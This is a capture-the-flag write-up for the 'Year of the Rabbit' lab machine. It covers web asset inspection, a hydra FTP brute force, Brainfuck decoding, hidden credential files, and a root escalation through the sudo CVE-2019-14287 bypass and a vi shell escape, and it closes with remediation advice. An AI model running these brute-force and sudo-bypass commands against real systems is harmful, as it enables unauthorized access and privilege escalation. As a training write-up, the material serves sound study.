Target IP: 10.201.x.x (Requires /etc/hosts entry usually, though IP works) Difficulty: Easy/Medium Objective: User (gwendoline) & Root (root.txt)

1. Executive Summary

“Year of the Rabbit” is a Linux machine that hides its initial entry point within web assets. Initial access involves inspecting web traffic to find a hidden directory, brute-forcing FTP credentials using a provided wordlist, and decoding esoteric languages (Brainfuck). Lateral movement relies on finding hidden files on the filesystem. Privilege escalation exploits CVE-2019-14287, a security bypass in sudo that allows a user restricted from running commands as root to do so by specifying the User ID -1.

Key TTPs (MITRE ATT&CK):

  • T1040 (Network Sniffing): Inspecting HTTP requests for hidden paths.
  • T1110 (Brute Force): Credential stuffing on FTP.
  • T1027 (Obfuscated Files or Information): Brainfuck decoding.
  • T1548.003 (Sudo and Sudo Caching): Exploiting Sudo CVE-2019-14287.

2. Enumeration

A. Network Scanning

Nmap reveals:

  • 21/tcp (FTP): vsftpd 3.0.2.
  • 22/tcp (SSH): OpenSSH 6.7p1 (Debian 5 - Old!).
  • 80/tcp (HTTP): Apache Default Page.

B. Web Forensics (The Hidden Asset)

The default Apache page looks boring, but inspecting the Network Tab (in browser dev tools) or using Burp Suite reveals a request to a CSS file that redirects strangely.

  • Request: /assets/style.css (or similar).
  • Interception: You noticed it redirected to or contained: /intermediary.php?hidden_directory=/WExYY2Cv-qU.

C. The Hidden Directory

Navigating to http://10.201.x.x/WExYY2Cv-qU reveals:

  1. Image: A “Hot Babe” (Rick & Morty reference).
  2. Wordlist: A list of potential passwords.
  3. Username: Explicitly stated as ftpuser.

3. Initial Access: The Rabbit Hole

A. FTP Brute Force

We have the user (ftpuser) and a small wordlist.

hydra -l ftpuser -P wordlist.txt ftp://10.201.x.x
  • Password: 5iez1wGXKfPKQ

B. Brainfuck Decoding

Logging into FTP reveals a file named eli (or content inside a file) containing Brainfuck code (++++++++++[>+...>).

C. SSH Access

ssh eli@10.201.x.x
# Password: DSpDiM1wAEwid

Status: User eli.


4. Lateral Movement: Gwendoline

A. Enumeration

Upon login, a message from Root hints at a “s3cr3t hiding place.” We search for it:

find / -name "*s3cr3t*" 2>/dev/null
# or
ls -la /usr/games/

Found: /usr/games/s3cr3t.

B. The Hidden Message

Inside, we find a hidden file .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!.

cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
  • Credentials: gwendoline : MniVCQVhQHUNI.

C. Switch User

su gwendoline

User Flag: user.txt.


5. Privilege Escalation: CVE-2019-14287

A. Sudo Analysis

sudo -l

Output:

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
  • Constraint: We can run vi, but the configuration explicitly says !root (Not Root). This is intended to prevent us from running it as UID 0.

B. The Exploit (Integer Overflow)

This is CVE-2019-14287. When sudo is configured to allow a command but deny root, older versions fail to validate the User ID -1 (or 4294967295). Sudo parses -1 as an unsigned integer, which wraps around to 0 (Root), effectively bypassing the name check.

Command:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

C. The Shell Escape

Once vi opens (running as root due to the exploit), we escape to a shell.

  1. Press ESC.
  2. Type :!/bin/sh or :shell.
  3. Press Enter.

Result:

# whoami
root

Root Flag: /root/root.txt.


6. Remediation (Blue Team)

  1. Patch Sudo: Update sudo to version 1.8.28 or higher immediately to fix CVE-2019-14287.
  2. Sudo Configuration:
  • Avoid giving NOPASSWD access to editors (vi, nano, man) as they allow trivial shell escapes.
  • If vi is needed, restrict it using sudoedit or specific wrappers, though this is still risky.
  1. Web Assets:
  • Clean up development artifacts (/intermediary.php) and wordlists from web directories.
  • Do not hide security through obscurity (hidden directory parameters).